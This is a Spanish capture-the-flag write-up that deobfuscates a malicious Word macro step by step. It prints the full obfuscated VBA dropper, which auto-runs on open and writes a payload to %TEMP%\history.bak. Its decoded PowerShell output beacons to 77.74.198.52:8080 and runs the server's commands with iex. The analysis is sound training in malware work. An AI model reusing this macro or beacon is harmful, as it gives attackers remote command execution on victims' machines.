| |56 65 98 103 65 105 |036352039382031303320363520313035203635203638|
| |65 68 48 65 74 65 66|203438203635203734203635203636 |
|Hex String|112 65 72 48 65 |31313220363520373220343820363520 |
|Hex String|75 81 65 55 65 71 |373520383120363520353520363520373120313037203|
| |107 65 90 103 65 103|635203930203130332036352031303320363520363720|
| |65 67 103 65 74 65 |31303320363520373420363520363620313036203635 |
| |66 106 65 | |
|Hex String| 65 65 76 81 66 117 |203635203635203736203831203636203131372036352|
| |65 71 85 65 73 65 65|037312038352036352037332036352036352031313020|
| |110 65 69 52 65 98 |363520363920353220363520393820313139203636203|
| |119 66 117 65 71 85 |13137203635203731203835 |
|Hex String|65 74 119 65 112 65 |363520373420313139203635203131322036352036372|
| |67 65 65 101 119 65 |036352036352031303120313139203635203130372036|
| |107 65 72 73 65 80 |352037322037332036352038302038312036362031313|
| |81 66 112 65 |220363520 |
|Hex String|71 85 65 101 |373120383520363520313031 |
|Hex String|65 65 103 |36352036352031303320 |
|Hex String|65 67 81 65 89 119 |363520363720383120363520383920313139203635203|
| |65 103 65 67 48 65 |130332036352036372034382036352038322038312036|
| |82 81 66 121 65 72 |362031323120363520373220373320363520393820313|
| |73 65 98 119 66 |139203636 |
|Hex String|121 65 69 69 65 89 |313231203635203639203639203635203839203131392|
| |119 66 48 65 71 107 |036362034382036352037312031303720363520393820|
| |65 98 119 66 117 65 |3131392036362031313720363520 |
|Hex String|67 65 65 85 119 66 |363720363520363520383520313139203636203438203|
| |48 65 |635 |
|Hex String|71 56 65 99 65 65 |373120353620363520393920363520363520313033203|
| |103 65 67 48 65 82 |635203637203438203635203832203831203636203132|
| |81 66 121 |3120 |
|Hex String|65 72 73 65 98 119 |363520373220373320363520393820313139203636203|
| |66 121 65 70 89 |13231203635203730203839 |
|Hex String|65 89 81 66 121 65 |363520383920383120363620313231203635203731203|
| |71 107 65 89 8 |130372036352038392038 |
|Hex String|1 66 105 65 71 119 |312036362031303520363520373120313139203635203|
| |65 90 81 65 103 65 |930203831203635203130332036352037312038352036|
| |71 85 65 79 |35203739 |
|Hex String|119 65 107 65 72 73 |313139203635203130372036352037322037332036352|
| |65 80 81 |0383020383120 |
|Hex String|66 80 65 72 85 65 |363620383020363520373220383520363520313030203|
| |100 65 65 116 65 70 |635203635203131362036352037302037372036352031|
| |77 65 100 65 66 |3030203635203636 |
|Hex String|121 65 7 |3132312036352037 |
|Hex String|1 107 65 98 103 66 |312031303720363520393820313033203636203131302|
| |110 65 67 65 65 76 |036352036372036352036352037362038312036362037|
| |81 66 74 65 71 52 65|342036352037312035322036352039392036352036362|
| |99 65 66 49 65 |03439203635 |
|Hex String|72 81 65 84 119 66 |373220383120363520383420313139203636203130352|
| |105 65 71 111 65 90 |036352037312031313120363520393020383120363620|
| |81 66 106 65 72 81 |313036203635203732203831203635203733203635203|
| |65 73 65 65 107 65 |63520313037203635203732 |
| |72 | |
|Hex String|65 79 119 65 107 65 |363520373920313139203635203130372036352037322|
| |72 81 65 80 81 66 |0383120363520383020383120363620 |
|Hex String|74 65 71 52 65 100 |373420363520373120353220363520313030203130332|
| |103 66 118 65 71 115|036362031313820363520373120313135203635203930|
| |65 90 | |
|Hex String|81 65 116 65 70 73 |383120363520313136203635203730203733203635203|
| |65 90 81 66 122 65 |930203831203636203132322036352037322038312036|
| |72 81 65 84 81 66 10|35203834203831203636203130 |
|Hex String|8 65 72 81 65 97 65 |382036352037322038312036352039372036352036362|
| |66 118 |0313138 |
|Hex String|65 71 81 65 73 |3635203731203831203635203733 |
|Hex String| 65 65 116 65 70 85 |203635203635203131362036352037302038352036352|
| |65 99 103 66 112 65 |039392031303320363620313132203635203637203635|
| |67 65 65 74 65 66 |20363520373420363520363620313139203635203637 |
| |119 65 67 | |
|Hex String|81 65 99 119 65 118 |383120363520393920313139203635203131382036352|
| |65 68 99 65 90 81 66|036382039392036352039302038312036362031303420|
| |104 65 68 73 65 77 |363520363820373320363520373720313139203636203|
| |119 66 104 65 68 73 |1303420363520363820373320 |
|Hex String|89 119 65 103 65 67 |383920313139203635203130332036352036372034382|
| |48 65 84 81 66 108 |036352038342038312036362031303820363520373220|
| |65 72 81 65 97 65 66|383120363520393720363520363620313138203635203|
| |118 65 71 |73120 |
|Hex String|81 65 73 65 |3831203635203733203635 |
|Hex String|66 81 |363620383120 |
|Hex String|65 69 56 65 85 119 |363520363920353620363520383520313139203636203|
| |66 85 65 67 65 65 76|835203635203637203635203635203736203831203636|
| |81 66 73 65 71 85 65|203733203635203731203835203635203839203831203|
| |89 81 66 107 65 |63620313037203635 |
|Hex String|71 85 65 99 103 66 |373120383520363520393920313033203636203132322|
| |122 65 67 65 65 81 |036352036372036352036352038312036352036362035|
| |65 66 55 |35 |
|Hex String| 65 67 73 65 81 81 |203635203637203733203635203831203831203636203|
| |66 49 65 72 81 65 |439203635203732203831203635 |
|Hex String|97 65 66 118 65 72 |393720363520363620313138203635203732203733203|
| |73 65 97 81 66 54 65|635203937203831203636203534203635203731203639|
| |71 69 65 100 65 66 |203635203130302036352036362031313220363520373|
| |112 65 71 56 65 98 |1203536203635203938 |
|Hex String| 103 |20313033 |
|Hex String|65 105 65 68 48 65 |363520313035203635203638203438203635203734203|
| |74 65 66 112 65 72 |635203636203131322036352037322034382036352037|
| |48 65 73 65 65 |3320363520363520 |
|Hex String|116 65 69 73 65 98 |313136203635203639203733203635203938203131392|
| |119 66 107 |0363620313037 |
|Hex String|65 72 |363520373220 |
|Hex String|107 65 73 65 65 111 |313037203635203733203635203635203131312036352|
| |65 70 115 65 85 119 |037302031313520363520383520313139203636203533|
| |66 53 65 72 77 65 |203635203732203737203635203130302036352036362|
| |100 65 66 108 65 71 |0313038203635203731 |
|Hex String|48 65 |3438203635 |
|Hex String| 76 103 66 85 65 71 |203736203130332036362038352036352037312038352|
| |85 65 101 65 66 48 |036352031303120363520363620343820363520363720|
| |65 67 52 65 82 81 66|353220363520383220383120363620313137203635203|
| |117 65 71 77 65 98 |731203737203635203938 |
|Hex String|119 66 107 65 71 107|313139203636203130372036352037312031303720363|
| |65 98 103 66 110 65 |520393820313033203636203131302036352037302034|
| |70 48 65 79 103 65 |382036352037392031303320363520353420363520373|
| |54 65 70 85 65 |0203835203635 |
|Hex String| 86 65 66 |203836203635203636 |
|Hex String|71 65 68 103 65 76 |373120363520363820313033203635203736203130332|
| |103 66 72 65 71 |03636203732203635203731 |
|Hex String| 85 65 100 65 66 67 |203835203635203130302036352036362036372036352|
| |65 72 107 65 100 65 |037322031303720363520313030203635203636203130|
| |66 108 65 |38203635 |
|Hex String|72 77 65 75 65 65 |373220373720363520373520363520363520313037203|
| |107 65 71 85 65 75 |635203731203835203635203735203131392036352031|
| |119 65 107 65 72 73 |303720363520373220373320363520373520383120363|
| |65 75 81 65 |5 |
|Hex String| 103 65 67 48 |20313033203635203637203438 |
|Hex String|65 97 103 66 |36352039372031303320363620 |
|Hex String|118 65 71 107 65 98 |313138203635203731203130372036352039382031303|
| |103 65 103 65 67 99 |320363520313033203635203637203939203635203733|
| |65 73 65 65 110 65 |203635203635203131302036352036372031303720363|
| |67 107 65 |5 |
|Hex String| 81 65 103 65 72 77 |203831203635203130332036352037322037372036352|
| |65 98 65 66 108 65 |039382036352036362031303820363520373120383520|
| |71 85 65 99 65 65 |363520393920363520363520313033203635203638203|
| |103 65 68 65 65 76 |63520363520373620313033 |
| |103 | |
|Hex String|65 52 65 72 48 65 83|363520353220363520373220343820363520383320363|
| |65 66 |520363620 |
|Hex String|85 65 69 73 65 101 |383520363520363920373320363520313031203131392|
| |119 65 49 65 72 85 |036352034392036352037322038352036352039392036|
| |65 99 65 65 122 65 |3520363520313232203635 |
|Hex String|72 73 65 88 119 65 |373220373320363520383820313139203635203132322|
| |122 65 68 81 65 78 8|036352036382038312036352037382038 |
|Hex String|1 66 53 65 70 56 65 |312036362035332036352037302035362036352039382|
| |98 81 65 48 65 71 77|03831203635203438203635203731203737203635 |
| |65 | |
|Hex String|99 103 65 119 65 68 |393920313033203635203131392036352036382038352|
| |85 65 102 81 |036352031303220383120 |
|Hex String|65 61 |3635203631 |
|Hex String|Scripting.FileSyst |536372697074696e672e46696c6553797374 |
|Hex String|emObject |656d4f626a656374 |
|Hex String|istory.bak |6973746f72792e62616b |
+----------+--------------------+---------------------------------------------+
Desofuscación de código VBA
Estamos interesados en los scripts de VBA anteriores. Vamos a comenzar por el más corto:
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
    ' Decodes a string of two-character hexadecimal pairs into the characters
    ' they encode: each pair is parsed with Val("&H..") and mapped through Chr$,
    ' and the characters are concatenated in order. An odd trailing nibble is
    ' parsed on its own, exactly as Mid$ hands it back.
    Dim decoded As String
    Dim pos As Long
    pos = 1
    Do While pos <= Len(tiyrahvbz)
        decoded = decoded & Chr$(Val("&H" & Mid$(tiyrahvbz, pos, 2)))
        pos = pos + 2
    Loop
    uxdufnkjlialsyp = decoded
End Function
Parece que está realizando algún tipo de transformación a la variable tiyrahvbz
pasada como argumento.
Luego, tenemos un script de VBA muy grande. Lo dividiré en trozos más pequeños. Estas son las primeras funciones:
Sub AutoOpen()
' Auto-exec macro: Word runs this procedure when the document is opened, so it
' is the entry point of the whole chain. It first drops the payload file to
' disk and then calls lmavedb (whose body is not shown in this listing).
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
' Dropper stage: assembles the obfuscated payload text in memory and writes it
' to %TEMP%\history.bak. The COM object name and the file name are passed as
' hex chunks through uxdufnkjlialsyp, so a plain string search of the macro for
' "Scripting.FileSystemObject" or "history.bak" finds nothing. Variables other
' than bnhupraoau are never declared (no Option Explicit in this module).
Dim bnhupraoau As String
' Sets the working directory of a throwaway WScript.Shell object to %TEMP%.
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
' Full decoded payload (hex -> decimal character codes -> text), built by
' sryivxjsdncj / okbzichkqtto.
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
' "53637269707469" & "6e672e46696c6553797374656d4f626a656374" decode to
' "Scripting.FileSystemObject" (see the olevba string table above).
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
' "5c68697374" & "6f72792e62616b" decode to "\history.bak"; the trailing True
' overwrites an existing file. %TEMP%\history.bak is the on-disk artefact to
' look for when triaging a host that opened this document.
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
La función llamada AutoOpen
se ejecuta primero, y llama a odhsjwpphlxnb
y lmavedb
. La primera llama a sryivxjsdncj
:
Private Function sryivxjsdncj() As String
    ' Thin wrapper around okbzichkqtto: the assembled payload text is returned
    ' unchanged (concatenating it onto an empty string adds nothing).
    sryivxjsdncj = okbzichkqtto()
End Function
Y aquí hay otra llamada a okbzichkqtto
, que es una función enorme:
Private Function okbzichkqtto() As String
' Returns the payload as a single string. Every line appends one fragment:
' the fragment is stored as a hex literal, decoded by uxdufnkjlialsyp into a
' space-separated list of decimal character codes, and turned into text by
' wdysllqkgsbzs. Splitting each hex literal into two "&"-joined halves is
' cosmetic obfuscation only; the halves are joined before decoding, so the
' split position carries no meaning. The writeup below identifies the
' assembled result as Base64 text.
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
' All fragments appended; hand back the complete string.
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Reconociendo patrones
En verdad no necesitamos saber Visual Basic for Applications (VBA), solamente tenemos que reconocer patrones sospechosos. Por ejemplo, la función okbzichkqtto
contiene un montón de strings que están codificadas en hexadecimal. Podemos coger la primera y decodificarla:
$ echo 3734203635203636203132322036352036382034382036352037342031 | xxd -r -p
74 65 66 122 65 68 48 65 74 1
Ahora tenemos números. A lo mejor son dígitos ASCII, vamos a ver:
$ python3 -q
>>> ''.join(map(lambda n: chr(int(n)), '74 65 66 122 65 68 48 65 74'.split()))
'JABzAD0AJ'
No parece nada prometedor…
Hallando el resultado
Nótese que el ejemplo anterior era para solo una string. En la función enorme teníamos un montón de strings que se concatenan usando los operadores +
y &
(que son equivalentes en cuanto a concatenación de strings en VBA).
De hecho, si leemos de nuevo la función uxdufnkjlialsyp
, parece claro que está decodificando la string en formato hexadecimal. Luego, wdysllqkgsbzs
realiza la transformación de dígitos ASCII a caracteres:
Private Function wdysllqkgsbzs(strBytes) As String
    ' Converts a space-separated list of decimal character codes
    ' (e.g. "74 65 66") back into the text those codes spell, one Chr() per
    ' token. Split() with no delimiter argument splits on single spaces, so an
    ' empty input yields an empty string and consecutive spaces yield an empty
    ' token (which Chr() rejects, as in the original).
    Dim codes As Variant
    Dim text As String
    Dim idx As Long
    codes = Split(strBytes)
    For idx = LBound(codes) To UBound(codes)
        text = text & Chr(codes(idx))
    Next idx
    wdysllqkgsbzs = text
End Function
Ahora, podemos adaptar el código anterior en Python fácilmente y encontrar el resultado de la función enorme:
$ python3 solve.py
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
El script se puede encontrar aquí: solve.py.
Flag
Ahora sí que reconocemos la salida como datos codificados en Base64, por lo que vamos a decodificarla para encontrar la flag. El texto decodificado está en UTF-16LE (cada carácter va seguido de un byte nulo; obsérvese el "JABzAD0A" del ejemplo anterior), y por eso el último comando elimina los bytes nulos con tr -d '\0' antes de pasar la salida a grep:
$ python3 solve.py | base64 -d
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}
$ python3 solve.py | base64 -d | tr -d \\0 | grep -oE 'HTB{.*?}'
HTB{5up3r_345y_m4cr05}